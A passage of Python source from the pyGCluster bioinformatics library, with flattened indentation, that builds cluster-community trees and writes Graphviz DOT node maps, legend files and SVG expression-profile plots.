first_cluster = community_obCoFreq2cluster_list[ 0 ][ 1 ]
name = ( tuple( sorted( community_indices ) ), level + 1 )
if name in self[ 'Communities' ]:
current_highest_obCoFreq = community_obCoFreq2cluster_list[ 0 ][ 0 ]
if current_highest_obCoFreq > self[ 'Communities' ][ name ][ 'highest obCoFreq' ]:
self[ 'Communities' ][ name ][ 'cluster ID' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ 'cluster ID' ]
community_obCoFreq2cluster_list.insert( 0, None ) # assure that the first cluster is also properly inserted
else:
# import copy
# print( self[ 'Communities' ][ ( first_cluster, level ) ][ 'index 2 obCoFreq dict' ] )
self[ 'Communities' ][ name ] = {}
self[ 'Communities' ][ name ][ 'children' ] = [ first_cluster ]
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ 'index 2 obCoFreq dict' ].copy()
self[ 'Communities' ][ name ][ 'cluster ID' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ 'cluster ID' ]
self[ 'Communities' ][ name ][ 'highest obCoFreq' ] = None
self[ 'Communities' ][ name ][ '# of nodes merged into community' ] = self[ 'Communities' ][ ( first_cluster, level ) ][ '# of nodes merged into community' ]
self[ 'Communities' ][ name ][ '# of nodes merged into community' ] += len( community_obCoFreq2cluster_list ) - 1.
# insert children and update obCoFreq-Dict:
for _, cluster in community_obCoFreq2cluster_list[ 1 : ]:
self[ 'Communities' ][ name ][ 'children' ].append( cluster )
placeholder_added = False
for index in cluster:
obCoFreq = self[ 'Communities' ][ ( cluster, level ) ][ 'index 2 obCoFreq dict' ].get( index, 0. )
if index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ]:
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ] += obCoFreq
else:
if not placeholder_added:
placeholder = len( self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ] ) * -1
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ placeholder ] = -99
placeholder_added = True
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ] = obCoFreq
max_freq = max(
list(
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].values()
) + [0.0]
)
self[ 'Communities' ][ name ][ 'highest obCoFreq' ] = max_freq
return
def init_cluster2community0_level(min_cluster_size = None, top_X_clusters = None, threshold_4_the_lowest_max_freq = None):
most_frequent_clusters = self._get_most_frequent_clusters( min_cluster_size = min_cluster_size, top_X_clusters = top_X_clusters, threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq )
level = 0
maxIndex = 0
self[ 'Communities' ] = {}
for cluster in sorted( most_frequent_clusters ):
index2obCoFreq = OrderedDict()
cFreq, cFreqDict = self.frequencies( cluster = cluster )
for index in cluster:
index2obCoFreq[ index ] = cFreq
# if index > 146:
# print("<")
# exit(1)
max_freq = cFreq # max_freq = max( index2obCoFreq.values() ) = cFreq, because the indices are only from a single cluster at level 0
name = ( cluster, level )
self[ 'Communities' ][ name ] = {}
self[ 'Communities' ][ name ][ 'children' ] = []
self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ] = index2obCoFreq
self[ 'Communities' ][ name ][ 'highest obCoFreq' ] = max_freq
self[ 'Communities' ][ name ][ 'cluster ID' ] = self[ 'Cluster 2 clusterID' ][ cluster ]
self[ 'Communities' ][ name ][ '# of nodes merged into community' ] = 1.
return
min_overlap = starting_min_overlap
init_cluster2community0_level(min_cluster_size = min_cluster_size, top_X_clusters = top_X_clusters, threshold_4_the_lowest_max_freq = threshold_4_the_lowest_max_freq)
level = 0
community_snapshot = None
while True:
cluster_list = self._get_levelX_clusters( level = level )
clusters_combined_into_communities = communities_by_ahc( cluster_list, min_overlap )
if community_snapshot == sorted( clusters_combined_into_communities ) or min_overlap >= 1.0:
break
self.plot_nodetree( 'AHCofClusters_binaryTree_iteration{0}.dot'.format(level) )
update_communities( level = level, clusters_combined_into_communities = clusters_combined_into_communities )
community_snapshot = sorted( clusters_combined_into_communities )
min_overlap += increasing_min_overlap
level += 1
return
def _get_descendants_in_binary_tree(self, node, children = None):
'''
Recursively determines the descendants of a given node in an AHC tree.
:param node: tuple describing uniquely a node in the AHC tree. It resembles a pyGCluster-cluster, but may contain the same index several times, e.g. if (1,2) and (1,3) are merged into (1,1,2,3).
:type node: tuple
:param children: all descendants determined so far. Should equal None for the first call.
:type children: list
:rtype: list
'''
if children is None:
children = []
if len( self[ 'Nodemap - binary tree' ][ node ][ 'children' ] ) > 0:
for child in self[ 'Nodemap - binary tree' ][ node ][ 'children' ]:
children.append( child )
self._get_descendants_in_binary_tree( node = child, children = children )
return children
def _get_descendants_in_community_tree(self, parent_name, children = None):
'''
Recursively determines the descendants of a given node in the community tree.
In contrast to :py:func:`pyGCluster.Cluster._get_descendants_in_binary_tree` , the community tree is not a binary tree;
and "parent_name" differs from the "node"-parameter of the former (see below).
:param parent_name: tuple with two elements: ( cluster, level ). Here, cluster is a pyGCluster-cluster, i.e. a tuple containing each index describing a cluster only once.
:type parent_name: tuple
:param children: all descendants determined so far. Should equal None for the first call.
:type children: list
:rtype: list
'''
if children is None:
children = []
if len( self[ 'Communities' ][ parent_name ][ 'children' ] ) > 0:
parent, level = parent_name
for child in self[ 'Communities' ][ parent_name ][ 'children' ]:
child_name = ( child, level - 1 )
children.append( child_name )
self._get_descendants_in_community_tree( parent_name = child_name, children = children )
return children
def create_rainbow_colors( self, n_colors = 10):
'''
Returns a list of rainbow colors. Colors are expressed as hexcodes of RGB values.
:param n_colors: number of rainbow colors.
:type n_colors: int
:rtype: list
'''
import colorsys
colors = []
for i in range( n_colors ):
# i has to be [0.0, 1.0[
i /= float( n_colors )
rgb = [ int(value) for value in colorsys.hsv_to_rgb(i, 1, 255) ]
hexcode = '#'
for _ in rgb:
_hex = hex(_)[2:]
if len(_hex) == 1:
_hex = '0{}'.format(_hex.upper())
else:
_hex = '{}'.format(_hex.upper())
hexcode += _hex
colors.append(hexcode)
return colors
def write_legend(self, filename = 'legend.txt'):
'''
Creates a legend for the community node map as a TXT file.
Herein, the object composition of each cluster of the node map as well as its frequencies are recorded.
Since this function is internally called by :py:func:`pyGCluster.Cluster.write_dot`, it is typically not necessary to call this function.
:param filename: name of the legend TXT file, best given with extension ".txt".
:type filename: string
:rtype: none
'''
with open( os.path.join( self[ 'Working directory' ] , filename ), 'w') as legend:
print( "Frequency order:\n{0}\n".format( ', '.join( sorted( self[ 'Distance-linkage combinations' ] ) ) ), file = legend )
for name in self[ 'Communities' ]:
cluster, level = name
if len( cluster ) > self[ 'for IO skip clusters bigger than' ]:
continue
if cluster in self[ 'Cluster 2 clusterID' ]:
cFreq, cFreqDict = self.frequencies( cluster = cluster )
else:
cFreqDict = { None : -99 }
nodeID = '{0}, {1}'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], level )
print( 'label = "{nodeID:0>3}", size = {size:0>3}, frequencies = {frequencies}'.format(
nodeID = nodeID,
size = len( cluster ),
frequencies = ', '.join( [ '{0:5.4f}'.format( f ) for method, f in sorted( cFreqDict.items() ) ] )
), file = legend
)
for index in cluster:
addOn = ''
try:
addOn = self[ 'Additional Labels' ][ self[ 'Identifiers' ][ index ] ]
if type(addOn) == type(list()) or type(addOn) == type(set()):
addOn = ".oOo.".join(list(set(addOn)))
except:
pass
print( '{0}\t{1}'.format( self[ 'Identifiers' ][ index ], addOn ), file = legend )
print( '+' * 50 , file = legend )
self._print( '... nodemap saved in "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 2 )
return
def write_dot(self, filename , scaleByFreq = True, min_obcofreq_2_plot = None, n_legend_nodes = 5, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = '1337', box_style = 'classic'):
'''
Writes a Graphviz DOT file representing the cluster composition of communities.
Herein, each node represents a cluster. Its name is a combination of the cluster's ID, followed by the level / iteration it was inserted into the community:
- The node's size reflects the cluster's cFreq.
- The node's shape illustrates by which distance metric the cluster was found (if the shape is a point, this illustrates that this cluster was not among the most_frequent_clusters, but only formed during AHC of clusters).
- The node's color shows the community membership; except for clusters which are larger than self[ 'for IO skip clusters bigger than' ], those are highlighted in grey.
- The node connecting all clusters is the root (the cluster holding all objects), which is highlighted in white.
The DOT file may be rendered with "Graphviz" or further processed with other appropriate programs such as e.g. "Gephi".
If "Graphviz" is available, the DOT file is eventually rendered with "Graphviz"'s dot-algorithm.
In addition, a expression map for each cluster of the node map is created (via :py:func:`pyGCluster.Cluster.draw_expression_map_for_community_cluster`).
Those are saved in the sub-folder "communityClusters".
This function also calls :py:func:`pyGCluster.Cluster.write_legend`,
which creates a TXT file containing the object composition of all clusters, as well as their frequencies.
:param filename: file name of the Graphviz DOT file representing the node map, best given with extension ".dot".
:type filename: string
:param scaleByFreq: switch to either scale nodes (= clusters) by cFreq or apply a constant size to each node (the latter may be useful to put emphasis on the nodes' shapes).
:type scaleByFreq: boolean
:param min_obcofreq_2_plot: if defined, clusters with lower cFreq than this value are skipped, i.e. not plotted.
:type min_obcofreq_2_plot: float
:param n_legend_nodes: number of nodes representing the legend for the node sizes. The node sizes themselves encode for the cFreq. "Legend nodes" are drawn as grey boxes.
:type n_legend_nodes: int
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0.
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map.
:type color_gradient: string
:param box_style: the way the relative standard deviation is visualized in the expression map. Currently supported are 'modern', 'fusion' or 'classic'.
:type box_style: string
:rtype: none
'''
self[ 'Function parameters' ][ self.write_dot.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import numpy
node_templateString = '"{nodeID}" [label="{label}", color="{color}", shape="{shape}", width="{freq}", height="{freq}", fixedsize=true, community={community}, c_members={c_members}, metrix="{metrix}", normalized_max_obCoFreq="{normalized_max_obCoFreq}"];'
node_templateString_dict = {}
edge_templateString = '"{parent}" -> "{child}" [color="{color}", arrowsize=2.0];'
edge_templateString_dict = {}
if 'Communities' not in self.keys():
self._print( 'function "build_nodemap()" was not called prior. Building node map with default settings ...', verbosity_level = 0 )
self.build_nodemap()
most_frequent_clusters_used_4_nodemap = set( self._get_levelX_clusters( level = 0 ) )
# assign each distance metric combo a specific shape (if possible):
metrix2shape = {}
n_metrices = len( self[ 'Distances' ] )
if len( self[ 'Distances' ] ) > 3:
self._print( '[ INFO ] more distance metrics than shapes! All shapes equal "ellipse".', verbosity_level = 1 )
shapes = [ 'ellipse' for i in range( n_metrices ** n_metrices ) ]
else:
shapes = [ 'box', 'ellipse', 'triangle', 'diamond', 'octagon', 'invtriangle', 'invtrapezium' ]
for i in range( 1, n_metrices + 1 ):
for metric_combo in itertools.combinations( self[ 'Distances' ] , i ):
metrix2shape[ ' + '.join( sorted( metric_combo ) ) ] = shapes.pop( 0 )
self._print( 'metric 2 shape:', metrix2shape , verbosity_level = 1 )
self[ 'nodemap metric2shape' ] = metrix2shape
# determine max obCoFreq for proper node scaling:
sorted_obCoFreqs = sorted( [ self[ 'Communities' ][ name ][ 'highest obCoFreq' ] for name in self[ 'Communities' ] ] )
max_obCoFreq = float( sorted_obCoFreqs[ -2 ] ) # sorted_obCoFreqs[ -1 ] == root, hence max_obCoFreq would always be cFreq(root) == 2.0!
# get top, i.e. largest cluster of each community:
max_level = max( [ name[1] for name in self[ 'Communities' ] ] )
communities_top_cluster = self._get_levelX_clusters( level = max_level )
# set colors:
communities_minus_close2root = [ c for c in communities_top_cluster if len( c ) < self[ 'for IO skip clusters bigger than' ] ]
community_colors = self.create_rainbow_colors( n_colors = len( communities_minus_close2root ) )
name2community_and_color = {}
for communityID, cluster in enumerate( communities_top_cluster ):
if cluster in communities_minus_close2root:
color = community_colors.pop( 0 )
else:
color = '#BEBEBE'
name = ( cluster, max_level )
communityID_color = ( communityID, color )
name2community_and_color[ name ] = communityID_color
for child_name in self._get_descendants_in_community_tree( parent_name = name ):
name2community_and_color[ child_name ] = communityID_color
# filter nodes by min_obcofreq_2_plot, and build 'name2nodeID'-dict:
name2nodeID = {}
skipped_nodes = set()
skipped_nodes.add( ( self[ 'Root' ], 0 ) )
for name in self[ 'Communities' ]:
name2nodeID[ name ] = len( name2nodeID )
if min_obcofreq_2_plot > self[ 'Communities' ][ name ][ 'highest obCoFreq' ]:
community, level = name
if max_level > level: # prevent that communities are lost if community freq < min_obcofreq_2_plot
skipped_nodes.add( name )
### write dot file:
dot_filename = os.path.join( self[ 'Working directory' ], filename )
with open( dot_filename, 'w' ) as dot:
## initialize DOT file:
print( 'digraph "pyGCluster nodemap" {', file = dot )
print( 'graph [overlap=Prism, splines=true, ranksep=5.0, nodesep=0.75];', file = dot )
print( 'node [style=filled]', file = dot )
scale_factor = 5.
## draw nodes:
for level in range( max_level + 1 ):
for cluster in self._get_levelX_clusters( level ):
name = ( cluster, level )
if name in skipped_nodes:
continue
# draw expression map:
if len( cluster ) <= self[ 'for IO skip clusters bigger than' ]:
self.draw_expression_map_for_community_cluster( name, min_value_4_expression_map = min_value_4_expression_map, max_value_4_expression_map = max_value_4_expression_map, color_gradient = color_gradient , sub_folder = 'communityClusters', box_style = box_style )
node_templateString_dict[ 'nodeID' ] = name2nodeID[ name ]
# scale node size:
if scaleByFreq:
normalized_obCoFreq = self[ 'Communities' ][ name ][ 'highest obCoFreq' ]
width = normalized_obCoFreq / max_obCoFreq * scale_factor
else:
width = 2.5
node_templateString_dict[ 'freq' ] = width
node_templateString_dict[ 'label' ] = '{0}-{1}'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], level )
# determine shape:
if cluster in most_frequent_clusters_used_4_nodemap:
clusterID = self[ 'Cluster 2 clusterID' ][ cluster ]
distances = set()
for i in numpy.nonzero( self[ 'Cluster counts' ][ clusterID ] > 0 )[ 0 ]:
distance, linkage = self[ 'Distance-linkage combinations' ][ i ].split( '-' )
distances.add( distance )
distances = ' + '.join( sorted( distances ) )
node_templateString_dict[ 'metrix' ] = distances
node_templateString_dict[ 'shape' ] = metrix2shape[ distances ]
else:
node_templateString_dict[ 'metrix' ] = 'None'
node_templateString_dict[ 'shape' ] = 'point'
# store the cluster's size (in terms of objects describing it), set color and community ID:
node_templateString_dict[ 'c_members' ] = len( cluster )
communityID, community_color = name2community_and_color[ name ]
node_templateString_dict[ 'color' ] = community_color
node_templateString_dict[ 'community' ] = communityID
node_templateString_dict[ 'normalized_max_obCoFreq' ] = self[ 'Communities' ][ name ][ 'highest obCoFreq' ]
# finally insert node into dot-file:
print( node_templateString.format( **node_templateString_dict ), file = dot )
## insert edges:
for level in range( 1, max_level + 1 ):
for parent in self._get_levelX_clusters( level ):
parent_name = ( parent, level )
edge_templateString_dict[ 'parent' ] = name2nodeID[ parent_name ]
edge_templateString_dict[ 'color' ] = name2community_and_color[ parent_name ][ 1 ]
for child in self[ 'Communities' ][ parent_name ][ 'children' ]:
child_name = ( child, level - 1 )
if child_name in skipped_nodes:
continue
edge_templateString_dict[ 'child' ] = name2nodeID[ child_name ]
# nut to break: child without direct parent ...
if parent_name in skipped_nodes:
# find largest parent:
communityID, _ = name2community_and_color[ child_name ]
# get all community clusters which are attributed the current communityID:
community_names = set()
for name in name2community_and_color:
ID, _ = name2community_and_color[ name ]
if ID == communityID and name != child_name and name[ 1 ] > child_name[ 1 ]:
community_names.add( name )
# Of those, extract clusters which are NOT to be skipped:
potential_parents = community_names - skipped_nodes
# get parent with lowest level:
min_level = max_level
for potential_parent_name in potential_parents:
parent, _level = potential_parent_name
if min_level > _level:
min_level = _level
for potential_parent_name in potential_parents:
parent, _level = potential_parent_name
if _level == min_level:
edge_templateString_dict[ 'parent' ] = name2nodeID[ potential_parent_name ]
break
print( edge_templateString.format( **edge_templateString_dict ), file = dot )
## connect largest cluster of each community with root:
root_name = ( self[ 'Root' ], -1 )
name2nodeID[ root_name ] = len( name2nodeID )
node_templateString_dict = {
'nodeID' : name2nodeID[ root_name ],
'freq' : scale_factor,
'label' : 'ROOT',
'c_members' : self[ 'Root size' ],
'community' : -1,
'color' : '#FFFFFF',
'metrix' : 'ALL',
'shape' : 'ellipse',
'normalized_max_obCoFreq' : '-99'
}
print( node_templateString.format( **node_templateString_dict ), file = dot )
edge_templateString_dict = { 'parent' : name2nodeID[ root_name ], 'color' : '#000000' }
for cluster in communities_top_cluster:
cluster_name = ( cluster, max_level )
edge_templateString_dict[ 'child' ] = name2nodeID[ cluster_name ]
print( edge_templateString.format( **edge_templateString_dict ), file = dot )
## add legend for the node size as additional, grey, boxed-sized nodes:
for i in range( 1, n_legend_nodes + 1 ):
f = max_obCoFreq * ( i / float( n_legend_nodes ) ) / max_obCoFreq
node_templateString_dict = {
'nodeID' : 'legend_node_{0}'.format( i ),
'freq' : f * scale_factor,
'label' : round( f, 4 ),
'c_members' : -1,
'community' : -1,
'color' : '#BEBEBE',
'metrix' : 'None',
'shape' : 'box',
'normalized_max_obCoFreq' : '-99'
}
print( node_templateString.format( **node_templateString_dict ), file = dot)
for i in range( 1, n_legend_nodes ):
edge_templateString_dict = { 'parent' : 'legend_node_{0}'.format( i ), 'child' : 'legend_node_{0}'.format( i + 1 ), 'color' : '#BEBEBE' }
print( edge_templateString.format( **edge_templateString_dict ), file = dot )
## finalize DOT file:
print( '}', file = dot )
self.write_legend(filename = '{0}__legend.txt'.format(filename[:-4]))
try:
rendered_filename = os.path.join( self[ 'Working directory' ], '{0}.pdf'.format( filename[ : -4 ] ) )
out, err = subprocess.Popen( [ 'dot', '-Tpdf', dot_filename, '-o', rendered_filename ], stdout = subprocess.PIPE, stderr = subprocess.PIPE ).communicate()
except:
self._print( '[ INFO ] only DOT file created, renderering with Graphviz failed.', verbosity_level = 1 )
return
def frequencies(self, identifier = None, clusterID = None, cluster = None):
'''
Returns a tuple with (i) the cFreq and (ii) a Collections.DefaultDict containing the DLC:frequency pairs for either
an identifier, e.g. "JGI4|Chlre4|123456"
or clusterID
or cluster.
Returns 'None' if the identifier is not part of the data set, or clusterID or cluster was not found during iterations.
Example:
>>> cFreq, dlc_freq_dict = cluster.frequencies( identifier = 'JGI4|Chlre4|123456' )
>>> dlc_freq_dict
... defaultdict(<type 'float'>,
... {'average-correlation': 0.0, 'complete-correlation': 0.0,
... 'centroid-euclidean': 0.0015, 'median-euclidean': 0.0064666666666666666,
... 'ward-euclidean': 0.0041333333333333335, 'weighted-correlation': 0.0,
... 'complete-euclidean': 0.0014, 'weighted-euclidean': 0.0066333333333333331,
... 'average-euclidean': 0.0020333333333333332})
:param identifier: search frequencies by identifier input
:type identifier: string
:param clusterID: search frequencies by cluster ID input
:type clusterID: int
:param cluster: search frequencies by cluster (tuple of ints) input
:type cluster: tuple
:rtype: tuple
'''
if identifier is None and clusterID is None and cluster is None:
self._print( 'invalid call of function "frequencies": neither "identifier", "clusterID" nor "cluster" were given.\n\treturning None ...',
file = sys.stderr,
verbosity_level = 0
)
return None
cFreqDict = ddict(float)
if identifier != None:
# search by identifier
ident_index = self[ 'Identifiers' ].index( identifier )
for cluster, clusterID in self[ 'Cluster 2 clusterID' ].items():
if ident_index in cluster:
for i, method in enumerate(self[ 'Distance-linkage combinations' ]):
freq = self[ 'Cluster counts' ][ clusterID ][ i ] / float( self[ 'Iterations' ] )
cFreqDict[ method ] += freq
elif cluster != None:
clusterID = self[ 'Cluster 2 clusterID' ][ cluster ]
if clusterID != None:
for i, dlc in enumerate( self[ 'Distance-linkage combinations' ] ):
freq = self[ 'Cluster counts' ][ clusterID ][ i ] / float( self[ 'Iterations' ] )
cFreqDict[ dlc ] = freq
distance_freqs = { distance : [] for distance in self[ 'Distances' ] }
for dlc, f in cFreqDict.items():
distance, linkage = dlc.split( '-' )
distance_freqs[ distance ].append( f )
cFreq = sum( [ self.median( f ) for dist, f in distance_freqs.items() ] )
return cFreq, cFreqDict
def plot_mean_distributions(self):
'''
Creates a density plot of mean values for each condition via rpy2.
:rtype: none
'''
try:
import rpy2.robjects as robjects
from rpy2.robjects import r
from rpy2.robjects.packages import importr
graphics = importr('graphics')
grdevices = importr('grDevices')
except ImportError:
self._print( '[ WARNING ] since "rpy2" is not available (ImportError), the plot of the distribution of mean values could not be created.', verbosity_level = 0 )
return
grdevices.pdf( os.path.join( self[ 'Working directory' ] , 'distribution_of_means.pdf'.format(condition) ) )
for condition in self[ 'Conditions' ]:
means = []
for identifier in self[ 'Data' ]:
mean, sd = self[ 'Data' ][ identifier ][ condition ]
means.append( mean )
graphics.plot(
r.density( robjects.FloatVector( means ) ),
main = condition,
col = 'blue',
xlab = 'Mean values',
ylab = 'Density',
)
grdevices.dev_off()
return
def draw_expression_profiles(self, min_value_4_expression_map = None, max_value_4_expression_map = None, conditions=None):
'''
Draws an expression profile plot (SVG) for each community, illustrating the main "expression pattern" of a community.
Each line in this plot represents an object. The "grey cloud" illustrates the range of the standard deviation of the mean values.
The plots are named prefixed by "exProf", followed by the community name as it is shown in the node map.
:param min_value_4_expression_map: minimum of the y-axis (since data should be log2 values, this value should typically be < 0).
:type min_value_4_expression_map: int
:param max_value_4_expression_map: maximum for the y-axis.
:type max_value_4_expression_map: int
:rtype: none
'''
if conditions is None:
conditions = self[ 'Conditions' ]
# print(conditions)
self[ 'Function parameters' ][ self.draw_expression_profiles.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import numpy
FONT_SIZE = 10
y_offset = 20
MIN_V, MAX_V = min_value_4_expression_map, max_value_4_expression_map
if min_value_4_expression_map is None or max_value_4_expression_map is None:
# determine min and max for y-axis:
_yAxisMinMax = set()
for identifier in self[ 'Data' ]:
for condition in self[ 'Data' ][ identifier ]:
mean, sd = self[ 'Data' ][ identifier ][ condition ]
_yAxisMinMax.add( round( mean + sd, 2 ) )
_yAxisMinMax.add( round( mean - sd, 2 ) )
if min_value_4_expression_map is None:
MIN_V = int( math.ceil( min( _yAxisMinMax ) ) ) - 1
if max_value_4_expression_map is None:
MAX_V = int( math.ceil( max( _yAxisMinMax ) ) )
# give y-axis the same amount in positive and negative direction (e.g. from - 10 to 10):
if min_value_4_expression_map is None and max_value_4_expression_map is None: # but only if no value is given, otherwise it's probably user-chosen!
if MAX_V > abs( MIN_V ):
MIN_V = MAX_V * -1
else:
MAX_V = MIN_V * -1
startingX = 100
startingY = 300 + y_offset # determine lenth of y-axis and y-range, represents zero point
maxY = ( startingY - y_offset ) * 2
scalingX = max( [ len( con ) * FONT_SIZE for con in conditions ] ) + 20 # distance between each condition
scalingY = ( maxY - ( startingY - y_offset ) ) / float( MAX_V ) * -1 # has to be negative!
def svg_text(x, y, text):
return '<text x="{0}" y="{1}"> {2} </text>'.format( x, y, text )
def svg_line(x1, y1, x2, y2):
return '<line x1="{0}" y1="{1}" x2="{2}" y2="{3}" style="stroke:#000000"/>'.format( x1, y1, x2, y2 )
def svg_comment(text):
return '<!-- {0} -->'.format( text )
def min_max_ratioWithSD(ratios, SDs):
ratios_plus_SD = [ ratio + SDs[ i ] for i, ratio in enumerate( ratios ) ]
ratios_minus_SD = [ ratio - SDs[ i ] for i, ratio in enumerate( ratios ) ]
return min( ratios_minus_SD ), max( ratios_plus_SD )
n_conditions = len( conditions )
max_level = max( [ name[1] for name in self[ 'Communities' ] ] )
for cluster in self._get_levelX_clusters( max_level ):
if len( cluster ) > self[ 'for IO skip clusters bigger than' ]:
continue
shape = ( len( cluster ), len( conditions ) )
ratios = numpy.zeros( shape )
SDs = numpy.zeros( shape )
identifiers = []
for row_index, identifier_index in enumerate( cluster ):
try:
identifier = self[ 'Identifiers' ][ identifier_index ]
except:
print(identifier_index, len( self['Identifiers']))
exit(1)
for col_index, condition in enumerate( conditions ):
mean, sd = self[ 'Data' ][ identifier ][ condition ]
ratios[ row_index ][ col_index ] = mean
SDs[ row_index ][ col_index ] = sd
addOn = ''
try:
addOn = self[ 'Additional Labels' ][ self['Identifiers'][ index ] ]
if type( addOn ) == type( list() ) or type( addOn ) == type( set() ):
addOn = ".oOo.".join( list( set( addOn ) ) )
except:
pass
if addOn:
identifiers.append( '{0}___{1}'.format( identifier, addOn ) )
else:
identifiers.append( identifier )
### draw expression profile:
communityID = self[ 'Communities' ][ ( cluster, max_level ) ][ 'cluster ID' ]
n_values = len( ratios )
with open( os.path.join( self[ 'Working directory' ] , 'exProf_{0}-{1}.svg'.format( communityID, max_level ) ), 'w') as fout:
width = startingX + scalingX * ( n_conditions -1 ) + len( conditions[ -1 ] ) * FONT_SIZE + max( [ len( i ) * FONT_SIZE for i in identifiers ] ) + 10
s = '<svg xmlns="http://www.w3.org/2000/svg" version="1.1" font-size="{2}px" font-family="Verdana" width="{0}" height="{1}">'
print( s.format( width, maxY + y_offset + FONT_SIZE, FONT_SIZE ), file = fout )
## draw SD-cloud:
# determine min and max ratio + SD:
print( svg_comment( 'SD CLOUD:' ), file = fout )
for i in range( n_conditions - 1 ):
y1_min, y1_max = min_max_ratioWithSD( [ ratios[ j ][ i ] for j in range( n_values ) ], [ SDs[ j ][ i ] for j in range( n_values ) ] )
y2_min, y2_max = min_max_ratioWithSD( [ ratios[ j ][ i + 1 ] for j in range( n_values ) ], [ SDs[ j ][ i + 1 ] for j in range( n_values ) ] )
s = '<path d="M{x1} {y1_min} L{x2} {y2_min} L{x2} {y2_max} L{x1} {y1_max} Z" fill="{fill}"/>'
d = { 'fill' : '#D3D3D3'}
d[ 'x1' ] = startingX + i*scalingX
d[ 'x2' ] = startingX+(i+1)*scalingX
d[ 'y1_min' ] = startingY + y1_min*scalingY
d[ 'y1_max' ] = startingY + y1_max*scalingY
d[ 'y2_min' ] = startingY + y2_min*scalingY
d[ 'y2_max' ] = startingY + y2_max*scalingY
print( s.format( **d ), file = fout )
## draw expression profile lines:
print( svg_comment( 'EXPRESSION PROFILE LINES:' ), file = fout )
for i in range( n_conditions - 1 ):
for j in range( n_values ):
d = {}
d[ 'x1' ] = startingX + i * scalingX
d[ 'x2' ] = startingX + ( i + 1 ) * scalingX
d[ 'y1' ] = startingY + ratios[ j ][ i ] * scalingY
d[ 'y2' ] = startingY + ratios[ j ][ i + 1 ] * scalingY
print( svg_line( x1 = d[ 'x1' ], y1 = d[ 'y1' ], x2 = d[ 'x2' ], y2 = d[ 'y2' ] ), file = fout )
## add legend:
print( svg_comment( 'LEGEND:' ), file = fout )
# first, collect all values to plot -> to allow removing overlapping identifiers:
legend = []
for i, identifier in enumerate( identifiers ):
_last_ratio = ratios[ i ][ -1 ]
_x = startingX + scalingX * ( n_conditions - 1 ) + 2
_y = startingY + _last_ratio * scalingY
legend.append( ( _y, _x, identifier ) )
legend.sort()
# get all y-differences:
y_differences = []
for i, ( y, x, identifier ) in enumerate( legend[ : -1 ] ):
y_differences.append( legend[ i + 1 ][ 0 ] - y )
# max font size for legend is the minimum y distance -> no overlap!
legend_maxFontSize = int( round( min( y_differences ) ) )
if legend_maxFontSize == 0:
legend_maxFontSize = 1
# plot legend
for y, x, identifier in legend:
print( '<text x="{0}" y="{1}" font-size="{3}px">{2}</text>'.format( x, y, identifier, legend_maxFontSize ), file = fout )
## plot axis:
print( svg_comment( 'AXES:' ), file = fout )
# y-axis:
print(svg_line( x1 = 50, y1 = startingY + MAX_V * scalingY, x2 = 50, y2 = maxY + y_offset), file = fout )
# y-axis - ticks:
y_ticks_per_unit = 2
for i in range( 1, MAX_V * y_ticks_per_unit + 1 ):
_ratio = float( i ) / y_ticks_per_unit
_y = startingY + _ratio * scalingY
print( svg_text( x = 0, y = _y + FONT_SIZE // 2, text = '+{0}'.format( _ratio ) ), file = fout )
print( svg_line( x1 = 40, y1 = _y, x2 = 60, y2 = _y ), file = fout )
for i in range( 1, abs( MIN_V ) * y_ticks_per_unit + 1 ):
_ratio = float( i ) / y_ticks_per_unit * -1
_y = startingY + _ratio * scalingY
print( svg_text( x = 0, y = _y + FONT_SIZE // 2, text = _ratio), file = fout )
print( svg_line( x1 = 40, y1 = _y, x2 = 60, y2 = _y), file = fout )
print( svg_text( x = 0, y = startingY + FONT_SIZE // 2, text = 0.0 ), file = fout )
print( svg_line( x1 = 40, y1 = startingY, x2 = 60, y2 = startingY ), file = fout )
# zero-line:
print( svg_line( x1 = 50, y1 = startingY, x2 = startingX + scalingX * ( n_conditions - 1 ), y2 = startingY ), file = fout )
# x-axis = conditions:
for i, condition in enumerate( conditions ):
_x = startingX + scalingX * i
print( svg_text( x= _x + 2, y = maxY + y_offset + FONT_SIZE, text = condition), file = fout )
s = '<line x1="{0}" y1="{1}" x2="{2}" y2="{3}" style="stroke-dasharray: 5, 5; stroke:#000000"/>'
print( s.format( _x, startingY + MAX_V * scalingY, _x, maxY + y_offset), file = fout )
print( '</svg>', file = fout )
self._print( '... community expression profile plots saved in "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 1 )
return
def do_it_all(
self,
working_directory = None,
distances = None,
linkages = None, function_2_generate_noise_injected_datasets = None,
min_cluster_size = 4, alphabet = None, force_plotting = False, min_cluster_freq_2_retain = 0.001,
pickle_filename = 'pyGCluster_resampled.pkl', cpus_2_use = None, iter_max = 250000,
iter_tol = 0.01 / 100000, iter_step = 5000, iter_top_P = 0.001, iter_window = 50000, iter_till_the_end = False,
top_X_clusters = None, threshold_4_the_lowest_max_freq = 0.01,
starting_min_overlap = 0.1, increasing_min_overlap = 0.05,
color_gradient = 'default', box_style = 'classic',
min_value_4_expression_map = None, max_value_4_expression_map = None, additional_labels = None
):
'''
Evokes all necessary functions which constitute the main functionality of pyGCluster.
This is AHC clustering with noise injection and a variety of DLCs,
in order to identify highly reproducible clusters,
followed by a meta-clustering of highly reproducible clusters into so-called 'communities'.
The functions that are called are:
- :py:func:`pyGCluster.Cluster.resample`
